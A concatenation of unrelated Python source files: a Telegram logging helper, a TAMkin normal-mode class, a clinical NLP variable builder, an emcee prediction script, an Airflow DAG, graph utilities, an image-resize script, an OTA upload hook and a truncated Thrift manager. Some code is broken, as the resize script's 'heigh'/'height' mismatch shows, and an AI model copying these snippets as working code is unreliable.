help="Run with more threads than the default of one.",
type=int,
default=1,
required=False,
)
parser.add_argument(
"--seed",
help="Fixing the seed will produce the same read mappings across different runs."
"By default, seed is randomly generated so this is not the case.",
type=int,
default=0,
required=False,
)
|
# -*- coding: utf-8 -*-
import datetime
import time
import os
import configparser
from PIL import Image
import telebot
PATH_TGCONFIG = 'tgsettings.ini'
#global tgconf
#global bot_result
#global tgbot
def newdir(tpath):
"""
Создание директории.
@param tpath: Имя директории.
"""
try:
os.mkdir(tpath)
except OSError:
print("Директория %s уже существует" % tpath)
else:
print("Успешно создана директория %s " % tpath)
def write_txt(name_log, str = ""):
"""
Записывает текст в файл с логом.
@param name_log: Имя файла.
@param str: Строка текста.
"""
with open(name_log, 'at', encoding='utf-8') as file:
if(str == ""):
file.write("\n")
else:
file.write(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ") + str + "\n")
def log_write_txt(str = ""):
"""
Запись логов в конкретный файл.
@param str: Строка текста.
"""
global tgconf
if (str != ""):
print(str)
write_txt(tgconf['log_file_name'], str)
def read_tgconfig(filename):
"""
Чтение конфигурации.
@param filename: Имя файла.
@return: (dict) - Конфигурация.
"""
cfg = configparser.ConfigParser(allow_no_value=True)
cfg.read(filename, encoding='utf-8')
conf = {'log_dir': cfg.get('DEFAULT', 'log_dir'),
'log_file_name': cfg.get('DEFAULT', 'log_file_name'),
'tglog': cfg.getboolean('DEFAULT', 'tglog'),
'name_group': cfg.get('DEFAULT', 'name_group'),
'token': cfg.get('DEFAULT', 'token'),
'count_exeption': cfg.getint('DEFAULT', 'count_exeption'),
'sleep_exeption': cfg.getfloat('DEFAULT', 'sleep_exeption')}
return conf
def send_tgmessage(text="", res=True, tgres=True):
"""
Отправка сообщения: на экран, в лог, в Telegram.
@param text: Строка текста.
@param res: Накопление текста во временной переменной для последующей его отправки. По умолчанию res=True накопления
не происходит и текст сразу отправляется в лог.
@param tgres: Накопление текста во временной переменной для Telegram.
@return: (bool) - Произошла успешная отправка сообщения?
"""
global tgconf
global bot_result
global tgbot
if res:
log_write_txt(text.replace("\n", " "))
if tgres:
if bot_result != "":
text = bot_result + "\n" + text
if not res:
log_write_txt(text.replace("\n", " "))
bot_result = ""
if tgbot is not None:
for _ in range(tgconf['count_exeption']):
try:
tgbot.send_message(tgconf['name_group'], text)
except OSError:
time.sleep(tgconf['sleep_exeption'])
continue
else:
return True
log_write_txt("Error send_tgmessage")
return False
else:
if bot_result != "":
bot_result = bot_result + "\n" + text
else:
bot_result = text[:]
return True
def send_tgphoto(file_name):
"""
Отправка фото.
@param file_name: Имя файла для отправки.
@return: (bool) - Произошла успешная отправка сообщения?
"""
global tgconf
global tgbot
log_write_txt("Photo: " + file_name)
if tgbot is not None:
for _ in range(tgconf['count_exeption']):
try:
tgbot.send_photo(tgconf['name_group'], open(file_name, 'rb'))
except OSError:
time.sleep(tgconf['sleep_exeption'])
continue
else:
return True
log_write_txt("Error send_tgphoto")
return False
return True
# Telegram
tgconf = read_tgconfig(PATH_TGCONFIG)
bot_result = ""
tgbot = telebot.TeleBot(tgconf['token']) if tgconf['tglog'] else None
if __name__ == "__main__":
newdir(tgconf['log_dir'])
send_tgmessage("Первое сообщение", tgres=False, res=True)
send_tgmessage("Второе сообщение", tgres=True, res=True)
send_tgphoto('.\{:}\metrics_class.png'.format(tgconf['log_dir']))
|
# coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import numpy as np
import tamkin
from pyiron.atomistics.job.atomistic import Trajectory
from molmod.units import *
from molmod.constants import *
from molmod.periodic import periodic
import matplotlib.pyplot as pt
class NMA(tamkin.NMA):
"""
This is a generic module to do a Normal Mode Analysis on a job type,
which calculates the gradient and the hessian using TAMkin based on a job object.
With the NMA object you can animate a certain mode and plot the IR spectrum.
"""
def __init__(self,job, atomic_units=False):
self.job = job
if not job['output/generic/hessian'] is None and not job['output/generic/forces'] is None:
structure = job.get_structure(-1)
if atomic_units:
mol = tamkin.Molecule(structure.get_atomic_numbers(),structure.get_positions(),np.array(structure.get_masses())*amu,
job['output/generic/energy_tot'],job['output/generic/forces']*-1 ,job['output/generic/hessian'])
else:
mol = tamkin.Molecule(structure.get_atomic_numbers(),structure.get_positions()*angstrom,np.array(structure.get_masses())*amu,
job['output/generic/energy_tot']*electronvolt,job['output/generic/forces']*-1*electronvolt/angstrom ,job['output/generic/hessian']*electronvolt/angstrom**2)
else:
raise ValueError('An NMA calculation requires a gradient and hessian.')
super(NMA, self).__init__(mol)
def animate_nma_mode(self,index,amplitude=1.0,frames=24,spacefill=False,particle_size=0.5):
'''
Visualize the normal mode corresponding to an index
**Arguments**
index index corresponding to a normal mode
amplitude size of the deviation of the normal mode
frames number of frames that constitute the full mode (lower means faster movement)
spacefill remove atom bonds
particle size
size of the atoms in the structure
'''
print("This mode corresponds to a frequency of {} 1/cm".format(self.freqs[index]/lightspeed/(1./centimeter)))
coordinates = self.coordinates
symbols = [periodic[n].symbol for n in self.numbers]
mode = self.modes[:,index]
if self.masses3 is not None:
mode /= np.sqrt(self.masses3)
mode /= np.linalg.norm(mode)
positions = np.zeros((frames,len(symbols),3))
for frame in range(frames):
factor = amplitude*np.sin(2*np.pi*float(frame)/frames)
positions[frame] = (coordinates + factor*mode.reshape((-1,3)))/angstrom
try:
import nglview
except ImportError:
raise ImportError("The animate_nma_mode() function requires the package nglview to be installed")
animation = nglview.show_asetraj(Trajectory(positions,self.job.structure))
if spacefill:
animation.add_spacefill(radius_type='vdw', scale=0.5, radius=particle_size)
animation.remove_ball_and_stick()
else:
animation.add_ball_and_stick()
return animation
def plot_IR_spectrum(self,width=10*lightspeed/centimeter,scale=1.0,intensities=None,charges=None):
"""
Plot IR spectrum based on Lorentzian width, freqs can be scaled through scale
Intensities can be provided (e.g. from a Gaussian job) or calculated from the charges
**Arguments**
width width of the Lorentzian function
scale scales the frequencies with this factor
intensities
IR intensities for spectrum, can be read from Gaussian job
charges charges to calculate IR intensities, from e.g. Yaff simulation
"""
if not intensities is None:
assert len(intensities) == (len(self.freqs)-len(self.zeros))
if intensities is None and charges is None:
raise ValueError('This function requires the charges or the intensities to calculate the line shape')
elif not intensities is None and not charges is None:
raise ValueError('Please only provide either the intensities or the charges')
else:
xr = np.arange(0,5001,1)*lightspeed/centimeter
alphas = np.zeros(len(xr))
# Calculate intensities
amps = self.modes
freqs = self.freqs * scale
for n, (wn, ampn) in enumerate(zip(np.delete(freqs,self.zeros),np.delete(amps,self.zeros,axis=0))): #self.zeros contain the indices of the zero frequencies
if not charges is None:
intensity = 0.0
for k in range(3):
for i, qi in enumerate(charges):
idx = 3*i+k
intensity += (qi*ampn[idx])**2
else:
intensity = intensities[n]
alphas += intensity*self._lorentz(xr,wn,width)
print('Mode %i: freq = %.3f 1/cm IR ampl. = %.3e a.u.' %(n, wn/(lightspeed/centimeter), intensity))
pt.clf()
pt.plot(xr/(lightspeed/centimeter),alphas)
pt.xlabel('Frequency [1/cm]')
pt.ylabel('Absorption [a.u.]')
pt.show()
@staticmethod
def _lorentz(x,p,w):
"""
Lorentzian line shape function, p is position of max, w is FWHM and x is current frequency
"""
return 1./(1.+((p-x)/(w/2.))**2)
|
import pathlib
import datetime
from loguru import logger
try:
import runrex.post.variable_builder as vb
except ImportError as ie:
logger.error('Need to install pandas: `pip install pandas`.')
raise ie
VARIABLES = {
'panc_with_competing_dx': ('+pancreatitis', '+competing_dx', '-competing_dx_NEGATIVE'),
'panc_without_competing_dx': ('+pancreatitis', '=competing_dx_NEGATIVE'),
'panc_with_pain': ('+pancreatitis', '+pain'),
'panc_with_radiating_to_back_pain': ('+pancreatitis', '+pain_RADIATING_TO_BACK'),
'panc_with_abdominal_pain': ('+pancreatitis', '+pain_ABD_PAIN'),
'acute_panc_without_competing_dx': ('+pancreatitis_ACUTE', '=competing_dx_NEGATIVE'),
'acute_panc_with_competing_dx': ('+pancreatitis', '+competing_dx', '-competing_dx_NEGATIVE'),
'panc_with_sudden_onset_pain': ('+pancreatitis', '+pain_SUDDEN_ONSET'),
'acute_panc_with_sudden_onset_pain': ('+pancreatitis_ACUTE', '+pain_SUDDEN_ONSET'),
'acute_panc_imaging': ('+pancreatitis_ACUTE', '+is_radiology'),
'panc_imaging': ('+pancreatitis', '+is_radiology'),
'panc_with_nausea': ('+pancreatitis', '+nausea'),
'panc_with_necrosis': ('+pancreatitis', '+necrosis'),
'panc_with_fluid': ('+pancreatitis', '+fluid'),
'panc_with_pseudocyst': ('+pancreatitis', '+pseudocyst'),
'panc_with_recency': ('+pancreatitis', '+pain_RECENT'),
'acute_panc_consistent': ('+pancreatitis_ACUTE', '+is_radiology'),
'panc_consistent': ('+pancreatitis', '+is_radiology'),
'necrosis_in_imaging': ('+is_radiology', '+necrosis'),
'fluid_in_imaging': ('+is_radiology', '+fluid'),
'pseudocyst_in_imaging': ('+is_radiology', '+pseudocyst'),
}
def build_variables(file, metafile):
res = vb.build_variables(file, metafile, extra_condition='is_radiology', **VARIABLES)
outdir = file.parent
res.to_csv(
outdir / f'ap_final_variables_{datetime.datetime.now().strftime("%Y%m%d")}.csv',
index=False
)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(fromfile_prefix_chars='@!')
parser.add_argument('-i', '--file', required=True, type=pathlib.Path,
help='Fullpath to file output CSV from `extract_and_load_json`.')
parser.add_argument('-m', '--metafile', required=True, type=pathlib.Path,
help='Fullpath to CSV file containing metadata. Must at least contain:'
' doc_id, patient_id, total_text_length, date. May also contain'
' other variables as well.')
args = parser.parse_args()
build_variables(args.file, args.metafile)
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import corner
import numpy as np
import pandas as pd
import emcee
import sys
import mm_likelihood
from astropy.time import Time
import commentjson as json
import mm_param
import mm_make_geo_pos
from tqdm import tqdm
import functools
class ReadJson(object):
def __init__(self, filename):
print('Read the runprops.txt file')
self.data = json.load(open(filename))
def outProps(self):
return self.data
#chain = (nwalkers, nlink, ndim)
def sample_deltas(i, draws, names, fixed_df, total_df_names, fit_scale, names_dict, runprops, nobj, fakeobsdf, geo_obj_pos, dlong, dlat):
paramdf = mm_param.from_fit_array_to_param_df(draws[i,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0]
drawparams = paramdf.iloc[:,:-nobj].values
DeltaLong_Model, DeltaLat_Model, fakeobsdf = mm_likelihood.mm_chisquare(paramdf, fakeobsdf, runprops, geo_obj_pos, gensynth = True)
length = len(DeltaLong_Model)
dlong = np.zeros((runprops.get('numobjects')-1, length))
dlat = np.zeros((runprops.get('numobjects')-1, length))
for j in range(1,runprops.get('numobjects')):
dlong[j-1,:] = DeltaLong_Model[j-1]
dlat[j-1,:] = DeltaLat_Model[j-1]
return dlong, dlat, drawparams
def predictions(sampler, fit_scale, float_names, obsdf, runprops, geo_obj_pos, fixed_df, total_df_names, pool):
numdraws = 1000
# Getting log likelihood posterior values and flatchain for use throughout
burnin = int(runprops.get('nburnin'))
clusterburn = int(runprops.get('clustering_burnin'))
thin_plots = int(runprops.get('nthinning'))
flatchain = sampler.get_chain(discard=int(burnin/thin_plots+clusterburn/thin_plots),flat = True, thin=thin_plots)
print(flatchain.shape, 'shape')
llhoods = sampler.get_log_prob(discard=int(burnin/thin_plots+clusterburn/thin_plots),flat = True, thin=thin_plots)
#ind = np.argmax(llhoods)
#params = flatchain[ind,:].flatten()
# Getting parameter names
names = []
for i in float_names:
names.append(i)
names_dict = runprops.get("names_dict")
# Choose random draws from the flatchain
drawsindex = np.random.randint(flatchain.shape[0], size = numdraws)
draws = flatchain[drawsindex,:]
llhoods = llhoods[drawsindex]
# Get time arrays
converttimes = ["2023-10-01","2024-09-30"]
t = Time(converttimes)
timesdic = {'start': t.isot[0], 'stop': t.isot[1], 'step': '6h'}
# Make a geocentric position file
geo_obj_pos = mm_make_geo_pos.mm_make_geo_pos(objname, timesdic, runprops, True)
# Creating a fake observtions data frame
times = geo_obj_pos.values[:,0].flatten()
fakeobsdf = obsdf.loc[[0,1],:]
for i in range(len(times)):
if i == 0 or i == 1:
fakeobsdf.iloc[i,0] = times[i]
fakeobsdf = fakeobsdf.append(fakeobsdf.iloc[-1,:])
fakeobsdf['time'].iloc[-1] = times[i]
fakeobsdf = fakeobsdf.iloc[2:]
# Creating arrays to hold outputs
dlong = np.zeros((draws.shape[0], runprops.get('numobjects')-1, times.size))
dlat = np.zeros((draws.shape[0], runprops.get('numobjects')-1, times.size))
# Holding paramvalues
nobj = runprops.get('numobjects')
print(mm_param.from_fit_array_to_param_df(draws[0,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0])
ndims = mm_param.from_fit_array_to_param_df(draws[0,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0].iloc[:,:-nobj].size
print(ndims)
paramnames = mm_param.from_fit_array_to_param_df(draws[0,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0].columns.tolist()[0:-nobj]
print(paramnames)
drawparams = np.zeros((ndims, numdraws))
deltas = functools.partial(sample_deltas, draws=draws, names=names, fixed_df=fixed_df, total_df_names=total_df_names, fit_scale=fit_scale, names_dict=names_dict, runprops=runprops, nobj=nobj, fakeobsdf=fakeobsdf, geo_obj_pos=geo_obj_pos, dlong=dlong, dlat=dlat)
x = tqdm(range(draws.shape[0]))
data = pool.map(deltas, x)
length = len(data)
dlong = np.zeros((draws.shape[0],2,length))
dlat = np.zeros((draws.shape[0],2,length))
for i in range(len(data)):
dlong[i] = data[i][0]
dlat[i] = data[i][1]
drawparams[:,i] = data[i][2]
# Now collapse the arrays with a std call
dlongstd = np.std(dlong,axis = 0)
dlatstd = np.std(dlat,axis = 0)
dlongmean = np.mean(dlong,axis = 0)
dlatmean = np.mean(dlat,axis = 0)
print(dlongstd.shape)
print(dlatstd.shape)
totaldf = pd.DataFrame(drawparams.T, columns = paramnames)
#print(totaldf)
# Calculate average (mean for now) error in the real data
name_dict = runprops.get("names_dict")
objectnames = []
for i in name_dict.values():
objectnames.append(i)
typicalerror = np.zeros((2,runprops.get('numobjects')-1))
for i in range(1,runprops.get('numobjects')):
typicalerror[0,i-1] = np.median(obsdf["DeltaLong_" + objectnames[i] + "_err"].values.flatten())
typicalerror[1,i-1] = np.median(obsdf["DeltaLat_" + objectnames[i] + "_err"].values.flatten())
# Now create info gain arrays
infogain = np.zeros((runprops.get('numobjects')-1, times.size))
infogain2 = np.zeros((runprops.get('numobjects')-1, times.size))
g_gain = np.zeros((runprops.get('numobjects')-1,2))
g_gains_ind = np.zeros((runprops.get('numobjects')-1,10))
for i in range(1,runprops.get('numobjects')):
infogain[i-1,:] = np.sqrt( (dlongstd[i-1,:]/typicalerror[0,i-1])**2 + (dlatstd[i-1,:]/typicalerror[1,i-1])**2 )
g_gain[i-1,0] = times[np.argmax(infogain[i-1,:])]
g_gain[i-1,1] = np.argmax(infogain[i-1,:])
g_gains_ind[i-1,:] = (-infogain[i-1,:]).argsort()[:10]
colorcycle = ['#377eb8', '#ff7f00', '#4daf4a', '#f781bf', '#a65628', '#984ea3','#999999', '#e41a1c', '#dede00']
fig = plt.figure(figsize = (12.8,4.8))
t = Time(times, format = "jd")
mat_times = matplotlib.dates.datestr2num(t.iso, default=None)
for i in range(1,runprops.get('numobjects')):
plt.plot_date(mat_times, infogain[i-1,:].flatten(), "-", color = colorcycle[i-1], label = objectnames[i], alpha = 0.5)
plt.title("Dates of greatest gain: JD "+str(g_gain[:,0]))
plt.xlabel("Time")
plt.ylabel("Info gained")
plt.legend()
plt.savefig("predictions.pdf", format = "pdf")
plt.close()
print('dlatmean',dlatmean)
inds = g_gains_ind[0].astype(int)
print('dlatmean',dlatmean[0,inds])
gains = pd.DataFrame(columns=['times','dates','Hercules_Delta_Lat','Hercules_Delta_Long','Hercules_angle_tot','Dysnomia_Delta_Lat','Dysnomia_Delta_Long','Dysnomia_angle_tot','infogain_val'])
gains['times'] = times[inds]
gains['dates'] = t.iso[inds]
# DS TODO: remove eris specific code
gains['Hercules_Delta_Lat'] = dlatmean[0,inds]
gains['Hercules_Delta_Long'] = dlongmean[0,inds]
gains['Hercules_angle_tot'] = np.sqrt(dlatmean[0,inds]**2+dlongmean[0,inds]**2)
gains['Dysnomia_Delta_Lat'] = dlatmean[1,inds]
gains['Dysnomia_Delta_Long'] = dlongmean[1,inds]
gains['Dysnomia_angle_tot'] = np.sqrt(dlatmean[1,inds]**2+dlongmean[1,inds]**2)
gains['infogain_val'] = infogain[1,inds]
print(gains)
gains.to_csv('predictions_df.csv')
# Plot dlong vs dlat with color for j2
from matplotlib.backends.backend_pdf import PdfPages
predictionspdf = PdfPages("predictions_params.pdf")
print("Making predictions params")
for i in range(len(paramnames)):
plt.figure()
plt.axis("equal")
plt.scatter(0,0, color = "black")
plt.scatter(dlong[:,0,int(g_gain[1,1])], dlat[:,0,int(g_gain[1,1])], c = totaldf[paramnames[i]], edgecolor = None, alpha = 0.5, s = 10, cmap = "coolwarm")
plt.errorbar(np.median(dlong[:,0,int(g_gain[1,1])]), np.median(dlat[:,0,int(g_gain[1,1])]), xerr = typicalerror[0,0], yerr = typicalerror[1,0], ecolor = "red")
plt.scatter(dlong[:,1,int(g_gain[1,1])], dlat[:,1,int(g_gain[1,1])], c = totaldf[paramnames[i]], edgecolor = None, alpha = 0.5, s = 10, cmap = "coolwarm",marker='D')
plt.errorbar(np.median(dlong[:,1,int(g_gain[1,1])]), np.median(dlat[:,1,int(g_gain[1,1])]), xerr = typicalerror[0,1], yerr = typicalerror[1,1], ecolor = "red")
plt.xlabel("dLon")
plt.ylabel("dLat")
plt.title(paramnames[i])
color_bar = plt.colorbar()
color_bar.set_alpha(1)
color_bar.draw_all()
color_bar.set_label(paramnames[i])
predictionspdf.savefig()
predictionspdf.close()
pospdf = PdfPages("posterior_prediction.pdf")
plt.figure()
plt.axis("equal")
plt.scatter(0,0, color = "black")
plt.scatter(dlong[:,0,int(g_gain[1,1])], dlat[:,0,int(g_gain[1,1])], c=llhoods, cmap = "coolwarm")
plt.errorbar(np.median(dlong[:,0,int(g_gain[1,1])]), np.median(dlat[:,0,int(g_gain[1,1])]), xerr = typicalerror[0,0], yerr = typicalerror[1,0], ecolor = "red")
plt.scatter(dlong[:,1,int(g_gain[1,1])], dlat[:,1,int(g_gain[1,1])], c=llhoods, cmap = "coolwarm",marker="D")
plt.errorbar(np.median(dlong[:,1,int(g_gain[1,1])]), np.median(dlat[:,1,int(g_gain[1,1])]), xerr = typicalerror[0,1], yerr = typicalerror[1,1], ecolor = "red")
plt.xlabel("dLon")
plt.ylabel("dLat")
plt.title("JD: "+str(g_gain[1,0]))
color_bar = plt.colorbar()
color_bar.set_alpha(1)
color_bar.draw_all()
color_bar.set_label('Log-Likelihood')
pospdf.savefig()
pospdf.close()
#Actually build the plots here
#====================================================================================================
import glob, os
if __name__ == '__main__':
from schwimmbad import MPIPool
with MPIPool() as pool:
if not pool.is_master():
pool.wait()
sys.exit(0)
if 'results' in os.getcwd():
getData = ReadJson('runprops.txt')
else:
getData = ReadJson('most_recent_runprops.txt')
runprops = getData.outProps()
objname = runprops.get("objectname")
if not 'results' in os.getcwd():
os.chdir('../../../results/'+objname+'/')
results = max(glob.glob(os.path.join(os.getcwd(), '*/')), key=os.path.getmtime)
os.chdir(results)
backend = emcee.backends.HDFBackend('chain.h5')
fit_scale = pd.read_csv('fit_scale.csv',index_col=0)
float_names = runprops.get('float_names')
obsdf = pd.read_csv(objname+'_obs_df.csv',index_col=0)
geo_obj_pos = pd.read_csv('geocentric_'+objname+'_position.csv',index_col=0)
fixed_df = pd.read_csv('fixed_df.csv',index_col=0)
total_df_names = runprops.get('total_df_names')
predictions(backend, fit_scale, float_names, obsdf, runprops, geo_obj_pos, fixed_df, total_df_names, pool)
|
#!/usr/bin/env python
# -*-coding:utf-8-*-
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime, timedelta
START_DT = datetime(2018,5,23,0)
default_args = {
'owner': 'cdwanze',
'depends_on_past': False,
'start_date': START_DT,
'retries': 1,
'retry_delay': timedelta(minutes=5),
}
dag = DAG('run_bash_script_example', default_args=default_args, schedule_interval='@weekly')
task_backup = BashOperator(
task_id = 'run_bash_script_example',
bash_command = 'test.sh',
dag = dag
)
|
import os
import unittest
from test import support
from test.support import import_helper
# skip tests if _ctypes was not built
ctypes = import_helper.import_module('ctypes')
ctypes_symbols = dir(ctypes)
def need_symbol(name):
return unittest.skipUnless(name in ctypes_symbols,
'{!r} is required'.format(name))
def load_tests(*args):
return support.load_package_tests(os.path.dirname(__file__), *args)
|
from zquantum.core.graph import (
generate_random_graph_erdos_renyi as _generate_random_graph_erdos_renyi,
generate_random_regular_graph as _generate_random_regular_graph,
generate_graph_from_specs as _generate_graph_from_specs,
save_graph,
)
import json
from typing import Union, Dict, Optional
def generate_random_graph_erdos_renyi(
number_of_nodes: int,
edge_probability: float,
random_weights: bool = False,
seed: Optional[int] = None,
):
graph = _generate_random_graph_erdos_renyi(
number_of_nodes, edge_probability, random_weights, seed
)
save_graph(graph, "graph.json")
def generate_random_regular_graph(
number_of_nodes: int,
degree: int,
random_weights: bool = False,
seed: Optional[int] = None,
):
graph = _generate_random_regular_graph(
number_of_nodes, degree, random_weights, seed
)
save_graph(graph, "graph.json")
def generate_complete_graph(
number_of_nodes: int, random_weights: bool = False, seed: Optional[int] = None
):
graph = _generate_random_graph_erdos_renyi(
number_of_nodes, 1.0, random_weights, seed
)
save_graph(graph, "graph.json")
def generate_graph_from_specs(graph_specs: Dict):
graph_specs_dict = json.loads(graph_specs)
graph = _generate_graph_from_specs(graph_specs_dict)
save_graph(graph, "graph.json")
|
from PIL import Image
from sys import argv
if len(argv) != 4:
exit("usage: python resize.py n infile outfile")
n = int(argv[1])
infile = argv[2]
outfile = argv[3]
inimage = Image.open(infile)
width, heigh = inimage.size
outimage = inimage.resize((width * n, height * n))
outimage.save(outfile)
# To resize small images
# python resize.py n image.extension out.originalImageExtension
# n = *number of resize
|
#!/usr/bin/python
Import ("env")
import os
def main():
input = "otapass.txt"
if not os.path.exists(input) or not os.path.isfile(input):
print(f"Error: {input} does not exist.")
env.Exit(1)
password = ""
with open(input) as f:
password = f.readline()
password = password.strip('\00')
env.Append(UPLOADERFLAGS=["-a", password])
main()
|
import time
import sys
import json
import threading
import wieraCommon
from pprint import pprint
from LocalInstanceToWieraIface import *
from LocalInstanceToWieraIface.ttypes import *
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
from WieraToLocalInstanceIface import *
from WieraToLocalInstanceIface.ttypes import *
class LocalInstanceToWieraHandler:
def __init__(self, policy, local_instance_manager):#iera_instance_manager):
self.policy = policy
self.local_instance_manager = local_instance_manager
self.lock = threading.Lock()
def updateMonitoringData(self, monitoring_info):
json_data = json.loads(monitoring_info)
result = self.local_instance_manager.update_monitoring_info(json_data)
return json.dumps(result)
def requestNewDataPlacementPolicy(self, request):
try:
self.lock.acquire()
json_request = json.loads(request)
result = self.policy.re_evaluate_data_placement(json_request)
finally:
self.lock.release()
return json.dumps(result)
def _send_peers_info(self, peer_info):
#empty query for first dataplacement.
bDataPlacement = False
if bDataPlacement == True and 'trips' in self.policy.policy_spec:
# monitoring_info = self.local_instance_manager.get_monitoring_info(['ebs-st1', 'ebs-gp2', 's3', 'standard-disk', 'premium-p10'])
monitoring_info = self.local_instance_manager.get_monitoring_info(['ebs-st1', 'ebs-gp2', 's3'])
#<F12 pprint(monitoring_info)
dummy_query = {}
dummy_query['access_info'] = {}
dummy_query['object_size'] = 8192
for hostname in self.local_instance_manager.instance_list:
dummy_query['access_info'][hostname] = {}
dummy_query['access_info'][hostname]['get_access_cnt'] = 1000000
dummy_query['access_info'][hostname]['put_access_cnt'] = 1000000
data_placement = self.policy.evaluate_data_placement(dummy_query, monitoring_info)
thread_list = []
for instance in self.local_instance_manager.instance_list:
client = self.local_instance_manager.get_local_instance_client(instance)
thread = wieraCommon.parallel_exec(client.dataPlacementChange, [json.dumps(data_placement),])
thread_list.append(thread)
wieraCommon.join_threads(thread_list)
thread_list = []
for instance in self.local_instance_manager.instance_list:
client = self.local_instance_manager.get_local_instance_client(instance)
thread = wieraCommon.parallel_exec(client.peersInfo, [json.dumps(peer_info),])
thread_list.append(thread)
wieraCommon.join_threads(thread_list)
def registerLocalInstance(self, instance_info, instance_ip):
# print 'registerTier' + str(instance_info)
instance_info = json.loads(instance_info)
try:
self.lock.acquire()
# print 'lock acquired'
result = {}
if instance_info != None:
hostname = instance_info['hostname']
if 'ip' not in instance_info:
ip = instance_ip.strip('::ffff:')
print ip + ' from callback_ip from thrift'
else:
ip = instance_info['ip']
stored_server_ip = self.local_instance_manager.policy.find_ip_by_hostname(hostname)
if stored_server_ip == None:
reason = 'Connection from ' + hostname + ':' + ip + ' is not in the expected location of Local server thus rejected.'
print reason
result['result'] = False
result['value'] = reason
elif ip != stored_server_ip:
reason = 'Hostname "' + hostname + '" is duplicated. ip: ' + ip + ' ip: ' + stored_server_ip
print reason
result['result'] = False
result['value'] = reason
else:
ports = instance_info['value']
application_port = ports['application_port']
print ports
if 'peer_port' in ports:
peer_port = ports['peer_port']
else:
peer_port = 0
instance_port = ports['instance_port']
self.local_instance_manager.add_local_instance(hostname, ip, application_port, peer_port, instance_port)
#check all instance are connected
#only TripS mode supports data placement
if self.policy.check_instance_cnt() == True:
peer_info = {}
peer_info['value'] = self.local_instance_manager.get_connected_instances()
peer_info['result'] = True;
#create thread for update peer info to all
thread = threading.Thread(target=self._send_peers_info, args=(peer_info,))
thread.daemon = True
thread.start()
#make dummy access dataplacement
result['value'] = json.dumps(self.policy.get_cost_info())
result['value2'] = json.dumps(self.policy.get_goals())
result['result'] = True
print '[TIM-' + self.local_instance_manager.policy.policy_id + ']' + hostname + '(' + ip + ':' + str(instance_port) + ') is registered.'
else:
result['result'] = False
result['value'] = 'Failed to load request to json'
finally:
self.lock.release()
# print 'lock released'
return json.dumps(result)
def requestPolicyChange(self, policy):
start = time.time()
#policy = json.loads(policy)
response = {}
failed_list = self.local_instance_manager.broadcast(policy, 'policyChange')
#there is failed instance
if len(failed_list) > 0:
for hostname in failed_list:
print '[TIM] failed to change policy.' + hostname + ' with a reason: ' + failed_list[hostname]['value']
response['result'] = False
response['value'] = 'Failed to change policy.'
else:
response['result'] = True
elapse = time.time() - start
print str(elapse * 1000) + ' ms takes to change policy'
return json.dumps(response)
class LocalInstanceManager:
def __init__(self, policy):#, expected_instance_cnt):
self.instance_list = {}
self.ip = wieraCommon.get_public_ip()
self.port = 0
self.policy = policy
self.monitoring_info = {}
self.monitoring_lock = threading.Lock()
# set handler to our implementation
# to avoid any sync issue with portnumber
handler = LocalInstanceToWieraHandler(policy, self)
processor = LocalInstanceToWieraIface.Processor(handler)
self.transport = TSocket.TServerSocket(None)
tfactory = TTransport.TFramedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
# set server
self.server = TServer.TThreadPoolServer(processor, self.transport, tfactory, pfactory, daemon=True)
self.port = self.transport.port
#set socket thread 20 min
self.server.setNumThreads(64)
#Thrift Server Start
self.instance_manager_thread = threading.Thread(target=self.run_forever, args=())
self.instance_manager_thread.daemon = True
self.instance_manager_thread.start()
def remove_local_instance(self, hostname):
# self.lock.acquire()
if hostname in self.instance_list:
del self.instance_list[hostname]
# self.lock.release()
def get_local_instance_client(self, hostname):
if hostname in self.instance_list:
client = self.instance_list[hostname]['thrift_client']
return client
return None
def get_instance_list(self):
return self.instance_list
def get_connected_instances(self):
#return as a list
instance_list = []
for hostname in self.instance_list:
ip = self.instance_list[hostname]['ip']
application_port = self.instance_list[hostname]['application_port']
peer_port = self.instance_list[hostname]['peer_port']
instance_info = (hostname, ip, application_port, peer_port)
instance_list.append(instance_info)
# print instance_list
return instance_list
def get_manager_server_info(self):
return (self.ip, self.port)
def add_local_instance(self, hostname, ip, application_port, peer_port, instance_port):
self.instance_list[hostname] = {}
self.instance_list[hostname]['ip'] = ip
self.instance_list[hostname]['application_port'] = application_port
self.instance_list[hostname]['peer_port'] = peer_port
self.instance_list[hostname]['instance_port'] = instance_port
# print self.instance_list[hostname]
#thrift needed.
transport = TSocket.TSocket(ip, instance_port)
transport = TTransport.TFramedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = WieraToLocalInstanceIface.Client(protocol)
transport.open()
self.instance_list[hostname]['thrift_client'] = client
self.instance_list[hostname]['socket'] = transport
try:
ret = client.ping()
except TException, e:
wieraCommon.PrintException()
#check need to propagate.
local_server_cnt = len(self.policy.get_available_host_list())
connected_cnt = len(self.instance_list)
if connected_cnt == local_server_cnt:
return self.get_connected_instances()
return None
def run_forever(self):
print '[TIM] Local Instance Manager is ready for Local Instance port: ' + str(self.port)
self.server.serve()
def stop_server(self):
print 'Try to close server and thrift client to instance.'
self.transport.close() #server
for hostname in self.instance_list:
self.instance_list[hostname]['socket'].close()
#will return failed_list
#req is Json type
#req_type is string type
def broadcast(self, req, req_type, instance_list=None, timeout=5):
failed_list = {}
thread_list = {}
if instance_list == None:
instance_list = self.instance_list
for hostname in instance_list:
client = instance_list[hostname]['thrift_client']
if client != None:
if req_type == 'policyChange':
thread = wieraCommon.parallel_exec(client.policyChange, [req,])
# print '[debug] sent dataDistribution message to ' + hostname
thread_list[hostname] = thread
elif req_type == 'dataPlacement':
thread = wieraCommon.parallel_exec(client.dataPlacementChange, [req,])
# print '[debug] sent dataPlacement message to ' + hostname
thread_list[hostname] = thread
else:
return 'Not supported request';
wieraCommon.join_threads(thread_list.values(), timeout)
for hostname in thread_list:
